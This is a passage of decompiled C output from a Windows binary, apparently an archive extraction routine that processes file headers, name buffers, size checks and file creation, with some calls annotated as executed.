				intOrPtr* _t582;
				signed int _t585;
				signed int _t586;
				signed int _t595;
				signed int _t596;
				intOrPtr _t599;
				signed int _t602;
				signed int _t611;
				signed int _t613;
				signed int _t616;
				signed int _t619;
				signed int _t621;
				signed int _t622;
				signed int _t624;
				signed int _t625;
				signed int _t628;
				void* _t637;
				intOrPtr _t645;
				char _t646;
				signed int _t649;
				signed int _t650;
				void* _t657;
				void* _t658;
				signed int _t675;
				intOrPtr _t686;
				void* _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t692;
				signed int _t695;
				intOrPtr _t697;
				signed int _t702;
				signed int _t704;
				signed int _t707;
				void* _t712;
				signed int _t713;
				signed int _t716;
				signed int _t717;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t725;

				E00C7EB78(0xc92858, _t721);
				E00C7EC50(0x60ac);
				_t582 =  *((intOrPtr*)(_t721 + 8));
				_t684 = 0;
				_t697 = __ecx;
				 *((intOrPtr*)(_t721 - 0x1c)) = __ecx;
				_t585 =  *( *((intOrPtr*)(__ecx + 8)) + 0x92fa) & 0x0000ffff;
				 *(_t721 - 0x18) = _t585;
				if( *((intOrPtr*)(_t721 + 0xc)) != 0) {
					_t704 = __ecx + 0x10;
					 *(_t721 - 0x20) = _t704;
					L5:
					_t383 =  *((intOrPtr*)(_t582 + 0x21f4));
					if(_t383 == 2) {
						 *(_t697 + 0x10ff) = _t684;
						__eflags =  *(_t582 + 0x32f4) - _t684;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t582 + 0x32fc) - _t684;
							if(__eflags > 0) {
								L26:
								_t586 =  *(_t697 + 8);
								__eflags =  *((intOrPtr*)(_t586 + 0x7164)) - _t684;
								if( *((intOrPtr*)(_t586 + 0x7164)) != _t684) {
									L29:
									 *(_t721 - 0x13) = _t684;
									_t37 = _t721 - 0x60b8; // -22712
									_t38 = _t721 - 0x13; // 0x7ed
									_t387 = E00C65D1A(_t582 + 0x2298, _t38, 6, _t684, _t37, 0x800);
									__eflags = _t387;
									 *(_t721 - 0x11) = _t387 != 0;
									__eflags = _t387;
									if(_t387 != 0) {
										__eflags =  *(_t721 - 0x13);
										if( *(_t721 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t697 + 0xf9)) = 0;
										}
									}
									E00C62112(_t582);
									_push(0x800);
									_t43 = _t721 - 0x30b8; // -10424
									_push(_t582 + 0x22c0);
									E00C6B76C(_t582);
									__eflags =  *((char*)(_t582 + 0x338b));
									 *(_t721 - 0x24) = 1;
									if( *((char*)(_t582 + 0x338b)) == 0) {
										_t392 = E00C62209(_t582);
										__eflags = _t392;
										if(_t392 == 0) {
											_t559 =  *(_t697 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t559 + 0x82c4));
											asm("sbb al, al");
											_t61 = _t721 - 0x11;
											 *_t61 =  *(_t721 - 0x11) &  !_t559;
											__eflags =  *_t61;
										}
									} else {
										_t562 =  *( *(_t697 + 8) + 0x82c4);
										__eflags = _t562 - 1;
										if(_t562 != 1) {
											__eflags =  *(_t721 - 0x13);
											if( *(_t721 - 0x13) == 0) {
												__eflags = _t562;
												 *(_t721 - 0x11) =  *(_t721 - 0x11) & (_t562 & 0xffffff00 | _t562 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t721 - 0x30b8; // -10424
												_t567 = E00C6C249(_t54);
												_t675 =  *(_t697 + 8);
												__eflags =  *((intOrPtr*)(_t675 + 0x82c4)) - 1 - _t567;
												if( *((intOrPtr*)(_t675 + 0x82c4)) - 1 != _t567) {
													 *(_t721 - 0x11) = 0;
												} else {
													_t57 = _t721 - 0x30b8; // -10424
													_push(1);
													E00C6C249(_t57);
												}
											}
										}
									}
									 *((char*)(_t697 + 0x67)) =  *((intOrPtr*)(_t582 + 0x3331));
									 *((char*)(_t697 + 0x68)) = 0;
									asm("sbb eax, [ebx+0x32f4]");
									 *0xc93278( *((intOrPtr*)(_t582 + 0x6cc0)) -  *(_t582 + 0x32f0),  *((intOrPtr*)(_t582 + 0x6cc4)), 0);
									 *((intOrPtr*)( *_t582 + 0x10))();
									_t685 = 0;
									_t398 = 0;
									_t595 = 0;
									 *(_t721 - 0xd) = 0;
									 *(_t721 - 0x28) = 0;
									__eflags =  *(_t582 + 0x3333);
									if( *(_t582 + 0x3333) == 0) {
										L44:
										__eflags =  *(_t721 - 0x11) - _t595;
										if( *(_t721 - 0x11) != _t595) {
											L47:
											_t707 =  *(_t721 - 0x18);
											_t596 =  *((intOrPtr*)( *(_t697 + 8) + 0x7201));
											_t400 = 0x49;
											__eflags = _t596;
											if(_t596 == 0) {
												L49:
												_t401 = _t685;
												L50:
												__eflags = _t596;
												_t88 = _t721 - 0x30b8; // -10424
												_t405 = L00C71B7F(_t596, _t88, (_t401 & 0xffffff00 | _t596 == 0x00000000) & 0x000000ff, _t401,  *(_t721 - 0x28)); // executed
												__eflags = _t405;
												if(__eflags == 0) {
													L14:
													_t406 = 0;
													__eflags = 0;
													L15:
													 *[fs:0x0] =  *((intOrPtr*)(_t721 - 0xc));
													return _t406;
												}
												_push(0x800);
												_t407 = _t697 + 0x1100;
												_push(_t407);
												 *((intOrPtr*)(_t721 - 0x38)) = _t407;
												_t91 = _t721 - 0x30b8; // -10424
												_push(_t582);
												E00C68167(__eflags);
												__eflags =  *(_t721 - 0xd);
												if( *(_t721 - 0xd) != 0) {
													L54:
													 *(_t721 - 0xe) = 0;
													L55:
													_t411 =  *(_t697 + 8);
													_t599 = 0x45;
													__eflags =  *((char*)(_t411 + 0x715b));
													_t686 = 0x58;
													 *((intOrPtr*)(_t721 - 0x34)) = _t599;
													 *((intOrPtr*)(_t721 - 0x30)) = _t686;
													if( *((char*)(_t411 + 0x715b)) != 0) {
														L57:
														__eflags = _t707 - _t599;
														if(_t707 == _t599) {
															L59:
															_t102 = _t721 - 0x20b8; // -6328
															E00C66EDB(_t102);
															_push(0);
															_t103 = _t721 - 0x20b8; // -6328
															_t416 = E00C6A56D(_t102, __eflags, _t697 + 0x1100, _t103);
															__eflags = _t416;
															if(_t416 == 0) {
																_t417 =  *(_t697 + 8);
																__eflags =  *((char*)(_t417 + 0x715b));
																_t114 = _t721 - 0xe;
																 *_t114 =  *(_t721 - 0xe) & (_t417 & 0xffffff00 |  *((char*)(_t417 + 0x715b)) != 0x00000000) - 0x00000001;
																__eflags =  *_t114;
																L65:
																_t116 = _t721 - 0x30b8; // -10424
																_t421 = E00C67C0D(_t582, _t116);
																__eflags = _t421;
																if(_t421 != 0) {
																	while(1) {
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			goto L69;
																		}
																		_t121 = _t721 - 0x30b8; // -10424
																		_t552 = E00C68117(_t697, _t582, _t121);
																		__eflags = _t552;
																		if(_t552 == 0) {
																			 *((char*)(_t697 + 0x2100)) = 1;
																			goto L14;
																		}
																		L69:
																		_t123 = _t721 - 0x1174; // -2420
																		_t602 = 0x40;
																		memcpy(_t123,  *(_t697 + 8) + 0x6024, _t602 << 2);
																		_t725 = _t723 + 0xc;
																		asm("movsw");
																		_t125 = _t721 - 0x2c; // 0x7d4
																		 *(_t721 - 4) = 0;
																		asm("sbb ecx, ecx");
																		_t132 = _t721 - 0x1174; // -2420
																		E00C6D051( *(_t721 - 0x20), 0,  *((intOrPtr*)(_t582 + 0x3334)), _t132,  ~( *(_t582 + 0x3338) & 0x000000ff) & _t582 + 0x00003339, _t582 + 0x3349,  *((intOrPtr*)(_t582 + 0x3384)), _t582 + 0x3363, _t125);
																		__eflags =  *(_t582 + 0x3333);
																		if( *(_t582 + 0x3333) == 0) {
																			L77:
																			_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																			L78:
																			 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																			_t153 = _t721 - 0x1174; // -2420
																			L00C6F204(_t153);
																			_t154 = _t721 - 0x1070; // -2160
																			E00C69556(_t154);
																			_t611 =  *(_t582 + 0x3398);
																			_t431 = 1;
																			 *(_t721 - 0x20) = _t611;
																			 *(_t721 - 4) = 1;
																			_t688 = 0x50;
																			__eflags = _t611;
																			if(_t611 == 0) {
																				L88:
																				_t432 = E00C62209(_t582);
																				__eflags = _t432;
																				if(_t432 == 0) {
																					_t613 =  *(_t721 - 0xe);
																					__eflags = _t613;
																					if(_t613 == 0) {
																						L98:
																						_t431 = 1;
																						__eflags = 1;
																						L99:
																						__eflags =  *(_t582 + 0x6ccc);
																						if(__eflags == 0) {
																							__eflags = _t613;
																							if(_t613 == 0) {
																								L218:
																								 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																								_t368 = _t721 - 0x1070; // -2160
																								_t398 = E00C6959A(_t368);
																								__eflags =  *(_t721 - 0x11);
																								_t595 =  *(_t721 - 0xe);
																								_t689 =  *(_t721 - 0xd);
																								if( *(_t721 - 0x11) != 0) {
																									_t372 = _t697 + 0xf4;
																									 *_t372 =  *(_t697 + 0xf4) + 1;
																									__eflags =  *_t372;
																								}
																								L220:
																								__eflags =  *((char*)(_t697 + 0x68));
																								if( *((char*)(_t697 + 0x68)) != 0) {
																									goto L14;
																								}
																								__eflags = _t595;
																								if(_t595 != 0) {
																									L17:
																									_t406 = 1;
																									goto L15;
																								}
																								__eflags =  *(_t582 + 0x6ccc) - _t595;
																								if( *(_t582 + 0x6ccc) == _t595) {
																									L9:
																									E00C61F47(_t582);
																									goto L17;
																								}
																								__eflags = _t689;
																								_t406 = _t398 & 0xffffff00 | _t689 != 0x00000000;
																								goto L15;
																							}
																							L104:
																							_t616 =  *(_t721 - 0x18);
																							L105:
																							_t435 =  *(_t697 + 8);
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) == 0) {
																								L107:
																								_t436 =  *(_t721 - 0xd);
																								__eflags = _t436;
																								if(_t436 != 0) {
																									L112:
																									 *((char*)(_t721 - 0x12)) = 1;
																									__eflags = _t436;
																									if(_t436 != 0) {
																										L114:
																										 *((intOrPtr*)(_t697 + 0xf0)) =  *((intOrPtr*)(_t697 + 0xf0)) + 1;
																										 *((intOrPtr*)(_t697 + 0x80)) = 0;
																										 *((intOrPtr*)(_t697 + 0x84)) = 0;
																										 *((intOrPtr*)(_t697 + 0x88)) = 0;
																										 *((intOrPtr*)(_t697 + 0x8c)) = 0;
																										E00C6AB1A(_t697 + 0xd0, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0))); // executed
																										E00C6AB1A(_t697 + 0xa8, _t688,  *((intOrPtr*)(_t582 + 0x3308)),  *((intOrPtr*)( *(_t697 + 8) + 0x92e0)));
																										_t442 =  *(_t582 + 0x32f0);
																										_t712 = _t697 + 0x10;
																										_t619 =  *(_t582 + 0x32f4);
																										 *(_t697 + 0x38) = _t442;
																										 *(_t697 + 0x30) = _t442;
																										_t222 = _t721 - 0x1070; // -2160
																										 *(_t697 + 0x3c) = _t619;
																										 *(_t697 + 0x34) = _t619;
																										E00C6D099(_t712, _t582, _t222);
																										_t621 =  *((intOrPtr*)(_t721 - 0x12));
																										_t690 = 0;
																										_t445 =  *(_t721 - 0xd);
																										 *((char*)(_t697 + 0x41)) = _t621;
																										 *((char*)(_t697 + 0x42)) = _t445;
																										 *(_t721 - 0x28) = 0;
																										 *(_t721 - 0x24) = 0;
																										__eflags = _t621;
																										if(_t621 != 0) {
																											L132:
																											_t622 =  *(_t697 + 8);
																											__eflags =  *((char*)(_t622 + 0x71a0));
																											 *((char*)(_t721 - 0x1053)) =  *((char*)(_t622 + 0x71a0)) == 0;
																											__eflags =  *((char*)(_t721 - 0x12));
																											if( *((char*)(_t721 - 0x12)) != 0) {
																												L136:
																												_t446 = _t690;
																												 *((char*)(_t721 - 0x10)) = _t690;
																												L137:
																												__eflags =  *(_t721 - 0x20);
																												 *((char*)(_t721 - 0x14)) = 1;
																												 *((char*)(_t721 - 0xf)) = 1;
																												if( *(_t721 - 0x20) == 0) {
																													__eflags =  *(_t582 + 0x3330);
																													if( *(_t582 + 0x3330) == 0) {
																														__eflags =  *((char*)(_t582 + 0x22b8));
																														if(__eflags != 0) {
																															_push( *(_t582 + 0x3388) & 0x000000ff);
																															_push( *((intOrPtr*)(_t582 + 0x338c)));
																															E00C73377(_t582,  *((intOrPtr*)(_t697 + 0xe8)));
																															_t485 =  *((intOrPtr*)(_t697 + 0xe8));
																															 *(_t485 + 0x4c48) =  *(_t582 + 0x32f8);
																															__eflags = 0;
																															 *(_t485 + 0x4c4c) =  *(_t582 + 0x32fc);
																															 *((char*)(_t485 + 0x4c60)) = 0;
																															E00C73020( *((intOrPtr*)(_t697 + 0xe8)),  *((intOrPtr*)(_t582 + 0x22b4)),  *(_t582 + 0x3388) & 0x000000ff); // executed
																														} else {
																															_push( *(_t582 + 0x32fc));
																															_push( *(_t582 + 0x32f8));
																															_push(_t712); // executed
																															E00C69215(_t582, _t697, __eflags); // executed
																														}
																													}
																													L169:
																													E00C61F47(_t582);
																													__eflags =  *((char*)(_t582 + 0x3331));
																													if( *((char*)(_t582 + 0x3331)) != 0) {
																														L172:
																														_t448 = 0;
																														__eflags = 0;
																														_t624 = 0;
																														L173:
																														__eflags =  *(_t582 + 0x3388);
																														if( *(_t582 + 0x3388) != 0) {
																															__eflags =  *((char*)(_t582 + 0x22b8));
																															if( *((char*)(_t582 + 0x22b8)) == 0) {
																																L181:
																																__eflags =  *(_t721 - 0xd);
																																 *((char*)(_t721 - 0x10)) = _t448;
																																if( *(_t721 - 0xd) != 0) {
																																	L191:
																																	__eflags =  *(_t721 - 0x20);
																																	_t691 =  *((intOrPtr*)(_t721 - 0xf));
																																	if( *(_t721 - 0x20) == 0) {
																																		L195:
																																		_t625 = 0;
																																		__eflags = 0;
																																		L196:
																																		__eflags =  *((char*)(_t721 - 0x12));
																																		if( *((char*)(_t721 - 0x12)) != 0) {
																																			goto L218;
																																		}
																																		_t713 =  *(_t721 - 0x18);
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x30));
																																		if(_t713 ==  *((intOrPtr*)(_t721 - 0x30))) {
																																			L199:
																																			__eflags =  *(_t721 - 0x20);
																																			if( *(_t721 - 0x20) == 0) {
																																				L203:
																																				__eflags = _t448;
																																				if(_t448 == 0) {
																																					L206:
																																					__eflags = _t625;
																																					if(_t625 != 0) {
																																						L214:
																																						_t449 =  *(_t697 + 8);
																																						__eflags =  *((char*)(_t449 + 0x71a8));
																																						if( *((char*)(_t449 + 0x71a8)) == 0) {
																																							_t714 = _t697 + 0x1100;
																																							_t450 = E00C6A4ED(_t697 + 0x1100,  *((intOrPtr*)(_t582 + 0x22bc))); // executed
																																							__eflags = _t450;
																																							if(__eflags == 0) {
																																								E00C62021(__eflags, 0x11, _t582 + 0x32, _t714);
																																								E00C66DCB(0xca1098, __eflags);
																																							}
																																						}
																																						 *(_t697 + 0x10ff) = 1;
																																						goto L218;
																																					}
																																					_t692 =  *(_t721 - 0x24);
																																					__eflags = _t692;
																																					_t628 =  *(_t721 - 0x28);
																																					if(_t692 > 0) {
																																						L209:
																																						__eflags = _t448;
																																						if(_t448 != 0) {
																																							L212:
																																							_t341 = _t721 - 0x1070; // -2160
																																							E00C69F09(_t341);
																																							L213:
																																							_t702 = _t582 + 0x32d8;
																																							asm("sbb eax, eax");
																																							asm("sbb ecx, ecx");
																																							asm("sbb eax, eax");
																																							_t349 = _t721 - 0x1070; // -2160
																																							E00C69DA2(_t349, _t582 + 0x32e8,  ~( *( *(_t697 + 8) + 0x82d0)) & _t702,  ~( *( *(_t697 + 8) + 0x82d4)) & _t582 + 0x000032e0,  ~( *( *(_t697 + 8) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t350 = _t721 - 0x1070; // -2160
																																							E00C69620(_t350);
																																							E00C67A78( *((intOrPtr*)(_t721 - 0x1c)),  *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)), _t582,  *((intOrPtr*)(_t721 - 0x38)));
																																							asm("sbb eax, eax");
																																							asm("sbb eax, eax");
																																							__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702;
																																							E00C69D9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d8)) & _t582 + 0x000032e8);
																																							_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																																							goto L214;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x88)) - _t628;
																																						if( *((intOrPtr*)(_t697 + 0x88)) != _t628) {
																																							goto L212;
																																						}
																																						__eflags =  *((intOrPtr*)(_t697 + 0x8c)) - _t692;
																																						if( *((intOrPtr*)(_t697 + 0x8c)) == _t692) {
																																							goto L213;
																																						}
																																						goto L212;
																																					}
																																					__eflags = _t628;
																																					if(_t628 == 0) {
																																						goto L213;
																																					}
																																					goto L209;
																																				}
																																				_t473 =  *(_t697 + 8);
																																				__eflags =  *((char*)(_t473 + 0x71a0));
																																				if( *((char*)(_t473 + 0x71a0)) == 0) {
																																					goto L218;
																																				}
																																				_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																				goto L206;
																																			}
																																			__eflags = _t625;
																																			if(_t625 != 0) {
																																				goto L203;
																																			}
																																			__eflags =  *(_t582 + 0x3398) - 5;
																																			if( *(_t582 + 0x3398) != 5) {
																																				goto L218;
																																			}
																																			__eflags = _t691;
																																			if(_t691 == 0) {
																																				goto L218;
																																			}
																																			goto L203;
																																		}
																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x34));
																																		if(_t713 !=  *((intOrPtr*)(_t721 - 0x34))) {
																																			goto L218;
																																		}
																																		goto L199;
																																	}
																																	__eflags =  *(_t582 + 0x3398) - 4;
																																	if( *(_t582 + 0x3398) != 4) {
																																		goto L195;
																																	}
																																	__eflags = _t691;
																																	if(_t691 == 0) {
																																		goto L195;
																																	}
																																	_t625 = 1;
																																	goto L196;
																																}
																																__eflags =  *((char*)(_t721 - 0x14));
																																if( *((char*)(_t721 - 0x14)) == 0) {
																																	goto L191;
																																}
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	goto L191;
																																}
																																__eflags =  *(_t582 + 0x3333) - _t624;
																																if(__eflags == 0) {
																																	L189:
																																	_push(3);
																																	L190:
																																	_pop(_t637);
																																	_t321 = _t721 - 0x30b8; // -10424
																																	E00C62021(__eflags, _t637, _t582 + 0x32, _t321);
																																	 *((char*)(_t721 - 0x10)) = 1;
																																	E00C66D83(0xca1098, 3);
																																	_t448 =  *((intOrPtr*)(_t721 - 0x10));
																																	goto L191;
																																}
																																__eflags =  *((intOrPtr*)(_t582 + 0x3359)) - _t624;
																																if( *((intOrPtr*)(_t582 + 0x3359)) == _t624) {
																																	L187:
																																	__eflags =  *((char*)(_t697 + 0xfc));
																																	if(__eflags != 0) {
																																		goto L189;
																																	}
																																	_push(4);
																																	goto L190;
																																}
																																__eflags =  *(_t582 + 0x6cdc) - _t624;
																																if(__eflags == 0) {
																																	goto L189;
																																}
																																goto L187;
																															}
																															__eflags =  *(_t582 + 0x32fc) - _t448;
																															if(__eflags < 0) {
																																goto L181;
																															}
																															if(__eflags > 0) {
																																L179:
																																__eflags = _t624;
																																if(_t624 != 0) {
																																	 *((char*)(_t697 + 0xfc)) = 1;
																																}
																																goto L181;
																															}
																															__eflags =  *(_t582 + 0x32f8) - _t448;
																															if( *(_t582 + 0x32f8) <= _t448) {
																																goto L181;
																															}
																															goto L179;
																														}
																														 *((char*)(_t697 + 0xfc)) = _t448;
																														goto L181;
																													}
																													asm("sbb eax, eax");
																													_t482 = E00C6AAEA(_t582, _t697 + 0xd0, _t582 + 0x3308,  ~( *(_t582 + 0x3362) & 0x000000ff) & _t582 + 0x00003363);
																													__eflags = _t482;
																													if(_t482 == 0) {
																														goto L172;
																													}
																													_t624 = 1;
																													_t448 = 0;
																													goto L173;
																												}
																												_t716 =  *(_t582 + 0x3398);
																												__eflags = _t716 - 4;
																												if(_t716 == 4) {
																													L151:
																													_push(0x800);
																													_t270 = _t721 - 0x50b8; // -18616
																													_push(_t582 + 0x339c);
																													E00C6B76C(_t582);
																													_push(0x800);
																													_t272 = _t721 - 0x40b8; // -14520
																													_t645 = _t697;
																													_t273 = _t721 - 0x50b8; // -18616
																													_push(_t582);
																													E00C68167(__eflags);
																													_t446 =  *((intOrPtr*)(_t721 - 0x10));
																													__eflags = _t446;
																													if(_t446 == 0) {
																														L159:
																														_t646 =  *((intOrPtr*)(_t721 - 0xf));
																														L160:
																														__eflags =  *((intOrPtr*)(_t582 + 0x6cc8)) - 2;
																														if( *((intOrPtr*)(_t582 + 0x6cc8)) != 2) {
																															L146:
																															__eflags = _t446;
																															if(_t446 == 0) {
																																L163:
																																_t495 = 0;
																																__eflags = 0;
																																L164:
																																 *(_t697 + 0x10ff) = _t495;
																																goto L169;
																															}
																															L147:
																															__eflags = _t646;
																															if(_t646 == 0) {
																																goto L163;
																															}
																															_t495 = 1;
																															goto L164;
																														}
																														__eflags = _t446;
																														if(_t446 != 0) {
																															goto L147;
																														}
																														L145:
																														 *((char*)(_t721 - 0x14)) = 0;
																														goto L146;
																													}
																													__eflags =  *((short*)(_t721 - 0x40b8));
																													if( *((short*)(_t721 - 0x40b8)) == 0) {
																														goto L159;
																													}
																													_t276 = _t721 - 0x40b8; // -14520
																													_push(0x800);
																													_push(_t697 + 0x1100);
																													__eflags = _t716 - 4;
																													if(__eflags != 0) {
																														_push(_t582 + 0x32);
																														_t281 = _t721 - 0x1070; // -2160
																														_t500 = E00C69155(_t690, _t697, _t716, __eflags);
																														_t646 = _t500;
																														 *((char*)(_t721 - 0xf)) = _t500;
																														L157:
																														__eflags = _t646;
																														if(_t646 == 0) {
																															L144:
																															_t446 =  *((intOrPtr*)(_t721 - 0x10));
																															goto L145;
																														}
																														_t446 =  *((intOrPtr*)(_t721 - 0x10));
																														goto L160;
																													}
																													_push( *(_t697 + 8));
																													_t501 = E00C67542(_t645, _t697, __eflags);
																													L155:
																													_t646 = _t501;
																													 *((char*)(_t721 - 0xf)) = _t646;
																													goto L157;
																												}
																												__eflags = _t716 - 5;
																												if(_t716 == 5) {
																													goto L151;
																												}
																												__eflags = _t716 - 1;
																												if(_t716 == 1) {
																													L149:
																													__eflags = _t446;
																													if(_t446 == 0) {
																														goto L159;
																													}
																													_push(_t697 + 0x1100);
																													_t501 = E00C677B8(_t622, _t697 + 0x10, _t582);
																													goto L155;
																												}
																												__eflags = _t716 - 2;
																												if(_t716 == 2) {
																													goto L149;
																												}
																												__eflags = _t716 - 3;
																												if(__eflags == 0) {
																													goto L149;
																												}
																												E00C62021(__eflags, 0x47, _t582 + 0x32, _t697 + 0x1100);
																												__eflags = 0;
																												_t646 = 0;
																												 *((char*)(_t721 - 0xf)) = 0;
																												goto L144;
																											}
																											__eflags = _t445;
																											if(_t445 != 0) {
																												goto L136;
																											}
																											_t508 = 0x50;
																											__eflags =  *(_t721 - 0x18) - _t508;
																											if( *(_t721 - 0x18) == _t508) {
																												goto L136;
																											}
																											_t446 = 1;
																											 *((char*)(_t721 - 0x10)) = 1;
																											goto L137;
																										}
																										__eflags =  *(_t582 + 0x6cdc);
																										if( *(_t582 + 0x6cdc) != 0) {
																											goto L132;
																										}
																										_t717 =  *(_t582 + 0x32fc);
																										_t695 =  *(_t582 + 0x32f8);
																										__eflags = _t717;
																										if(__eflags < 0) {
																											L131:
																											_t690 = 0;
																											__eflags = 0;
																											_t712 = _t697 + 0x10;
																											goto L132;
																										}
																										if(__eflags > 0) {
																											L119:
																											_t649 =  *(_t582 + 0x32f0);
																											_t650 = _t649 << 0xa;
																											__eflags = ( *(_t582 + 0x32f4) << 0x00000020 | _t649) << 0xa - _t717;
																											if(__eflags < 0) {
																												L130:
																												_t445 =  *(_t721 - 0xd);
																												goto L131;
																											}
																											if(__eflags > 0) {
																												L122:
																												__eflags =  *((intOrPtr*)(_t582 + 0x10)) - 1;
																												if( *((intOrPtr*)(_t582 + 0x10)) == 1) {
																													goto L130;
																												}
																												__eflags = _t717;
																												if(__eflags < 0) {
																													L129:
																													_t244 = _t721 - 0x1070; // -2160
																													E00C69A3C(_t244,  *(_t582 + 0x32f8),  *(_t582 + 0x32fc));
																													 *(_t721 - 0x28) =  *(_t582 + 0x32f8);
																													 *(_t721 - 0x24) =  *(_t582 + 0x32fc);
																													goto L130;
																												}
																												if(__eflags > 0) {
																													L126:
																													_t515 = E00C6981A(_t695);
																													__eflags = _t695 -  *(_t582 + 0x32f4);
																													if(__eflags < 0) {
																														goto L130;
																													}
																													if(__eflags > 0) {
																														goto L129;
																													}
																													__eflags = _t515 -  *(_t582 + 0x32f0);
																													if(_t515 <=  *(_t582 + 0x32f0)) {
																														goto L130;
																													}
																													goto L129;
																												}
																												__eflags = _t695 - 0x5f5e100;
																												if(_t695 < 0x5f5e100) {
																													goto L129;
																												}
																												goto L126;
																											}
																											__eflags = _t650 - _t695;
																											if(_t650 <= _t695) {
																												goto L130;
																											}
																											goto L122;
																										}
																										__eflags = _t695 - 0xf4240;
																										if(_t695 <= 0xf4240) {
																											goto L131;
																										}
																										goto L119;
																									}
																									L113:
																									_t202 = _t697 + 0xec;
																									 *_t202 =  *(_t697 + 0xec) + 1;
																									__eflags =  *_t202;
																									goto L114;
																								}
																								 *((char*)(_t721 - 0x12)) = 0;
																								_t517 = 0x50;
																								__eflags = _t616 - _t517;
																								if(_t616 != _t517) {
																									_t196 = _t721 - 0x1070; // -2160
																									__eflags = E00C698BC(_t196);
																									if(__eflags != 0) {
																										E00C62021(__eflags, 0x3b, _t582 + 0x32, _t697 + 0x1100);
																										E00C66E98(0xca1098, _t721, _t582 + 0x32, _t697 + 0x1100);
																									}
																								}
																								goto L113;
																							}
																							 *(_t697 + 0x10ff) = 1;
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) != 0) {
																								_t436 =  *(_t721 - 0xd);
																								goto L112;
																							}
																							goto L107;
																						}
																						 *(_t721 - 0xd) = _t431;
																						 *(_t721 - 0xe) = _t431;
																						_t185 = _t721 - 0x30b8; // -10424
																						_t525 = L00C71B7F(__eflags, _t185, 0, 0, _t431);
																						__eflags = _t525;
																						if(_t525 != 0) {
																							goto L104;
																						}
																						__eflags = 0;
																						 *(_t721 - 0x24) = 0;
																						L102:
																						_t187 = _t721 - 0x1070; // -2160
																						E00C6959A(_t187);
																						_t406 =  *(_t721 - 0x24);
																						goto L15;
																					}
																					_t180 = _t721 - 0x1070; // -2160
																					_push(_t582);
																					_t529 = E00C67FC0(_t697);
																					_t613 = _t529;
																					 *(_t721 - 0xe) = _t529;
																					L97:
																					__eflags = _t613;
																					if(_t613 != 0) {
																						goto L104;
																					}
																					goto L98;
																				}
																				__eflags =  *(_t721 - 0xe);
																				if( *(_t721 - 0xe) != 0) {
																					_t530 =  *(_t721 - 0x18);
																					__eflags = _t530 - 0x50;
																					if(_t530 != 0x50) {
																						_t657 = 0x49;
																						__eflags = _t530 - _t657;
																						if(_t530 != _t657) {
																							_t658 = 0x45;
																							__eflags = _t530 - _t658;
																							if(_t530 != _t658) {
																								_t531 =  *(_t697 + 8);
																								__eflags =  *((intOrPtr*)(_t531 + 0x7160)) - 1;
																								if( *((intOrPtr*)(_t531 + 0x7160)) != 1) {
																									 *(_t697 + 0xec) =  *(_t697 + 0xec) + 1;
																									_t178 = _t721 - 0x30b8; // -10424
																									_push(_t582);
																									E00C67DB2(_t697);
																								}
																							}
																						}
																					}
																				}
																				goto L102;
																			}
																			__eflags = _t611 - 5;
																			if(_t611 == 5) {
																				goto L88;
																			}
																			_t613 =  *(_t721 - 0xe);
																			__eflags = _t613;
																			if(_t613 == 0) {
																				goto L99;
																			}
																			_t616 =  *(_t721 - 0x18);
																			__eflags = _t616 - _t688;
																			if(_t616 == _t688) {
																				goto L105;
																			}
																			_t534 =  *(_t697 + 8);
																			__eflags =  *((char*)(_t534 + 0x7201));
																			if( *((char*)(_t534 + 0x7201)) != 0) {
																				goto L105;
																			}
																			_t719 = _t697 + 0x1100;
																			 *((char*)(_t721 - 0x12)) = 0;
																			_t536 = E00C6A231(_t719);
																			__eflags = _t536;
																			if(_t536 == 0) {
																				L86:
																				__eflags =  *((char*)(_t721 - 0x12));
																				if( *((char*)(_t721 - 0x12)) == 0) {
																					goto L104;
																				}
																				L87:
																				_t613 = 0;
																				 *(_t721 - 0xe) = 0;
																				goto L97;
																			}
																			__eflags =  *((char*)(_t721 - 0x12));
																			if( *((char*)(_t721 - 0x12)) != 0) {
																				goto L87;
																			}
																			__eflags = 0;
																			_push(0);
																			_push(_t582 + 0x32d8);
																			_push( *(_t582 + 0x32fc));
																			_t167 = _t721 - 0x12; // 0x7ee
																			_push( *(_t582 + 0x32f8));
																			_push(0x800);
																			_push(_t719);
																			_push(0);
																			_push( *(_t697 + 8));
																			E00C692A3();
																			goto L86;
																		}
																		__eflags =  *((char*)(_t582 + 0x3359));
																		if( *((char*)(_t582 + 0x3359)) == 0) {
																			goto L77;
																		}
																		_t137 = _t721 - 0x2c; // 0x7d4
																		_t543 = E00C80C4A(_t582 + 0x335a, _t137, 8);
																		_t723 = _t725 + 0xc;
																		__eflags = _t543;
																		if(_t543 == 0) {
																			goto L77;
																		}
																		__eflags =  *(_t582 + 0x6cdc);
																		_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																		if( *(_t582 + 0x6cdc) != 0) {
																			goto L78;
																		}
																		__eflags =  *((char*)(_t697 + 0x10fe));
